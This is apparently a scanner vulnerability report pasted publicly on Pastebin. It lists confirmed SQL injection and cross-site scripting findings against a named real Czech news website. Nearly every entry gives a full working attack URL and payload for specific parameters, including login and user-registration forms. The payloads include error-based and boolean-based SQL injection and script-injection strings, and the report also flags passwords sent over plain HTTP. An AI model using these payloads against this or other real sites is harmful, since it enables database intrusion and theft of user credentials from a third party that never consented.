Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?slovo=' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='&zkr=0
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: ' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/data/kliknuto.asp?cl=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cl
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| Boolean Based SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?slovo=' OR 'ns'='ns&zkr=0
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: ' OR 'ns'='ns
- ||| [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?slovo='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&zkr=0
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=%27&zkr=3829
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=NSFTW&zkr=3829
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: NSFTW
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/data/kliknuto.asp?cl=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cl
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- URL : http://www.plno.cz/NEWS/data/VlozUzivatele.asp
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: fax1
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/data/OvereniUzivatele.asp
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: login
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity: Critical
- Confirmation:Confirmed
- URL : http://www.plno.cz/NEWS/data/VlozUzivatele.asp
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: fax2
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- ||| XSS (Cross-site Scripting)
- Severity : Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o='"--></style></script><script>alert(0x000449)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000449)</script>
- Severity : Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?slovo='"--></style></script><script>alert(0x000460)</script>&zkr=0
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: slovo
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000460)</script>
- Severity : Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o='"--></style></script><script>alert(0x000496)</script>&zkr=3829
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000496)</script>
- Severity : Important
- Confirmation : Confirmed
- URL : http://www.plno.cz/NEWS/registrace.asp?email='"--></style></script><script>netsparker(0x0004FA)</script>&fax1=3&fax2=3&hsl1=3&hsl2=3&info=N&jmeno=3&K=3&kod=3&login=3&obec=3&pozn1=3&prijmeni=3&psc=3&report=N&tel1=3&tel2=3&ulice=3&UzN=3&zeme=1&e=1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0004FA)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/registrace.asp?email=netsparker@example.com&fax1=3&fax2=3&hsl1='"--></style></script><script>netsparker(0x0005AD)</script>&hsl2=3&info=N&jmeno=3&K=3&kod=3&login=3&obec=3&pozn1=3&prijmeni=3&psc=3&report=N&tel1=3&tel2=3&ulice=3&UzN=3&zeme=1&h=1
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: hsl1
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0005AD)</script>
- ||| Password Transmitted Over HTTP
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/registrace.asp
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Form target action: data/VlozUzivatele.asp
- ||| Robots.txt Identified
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.plno.cz/robots.txt
- Interesting Robots.txt
- Entries:
- Disallow: /DATA/
- Disallow: /NEWS/
- Disallow: /NEWS/DATA/
- ||| MySQL Database Identified
- Severity: Information
- Confirmation: Confirmed
- URL: http://www.plno.cz/NEWS/default.asp?o=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Parameter Name: o
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement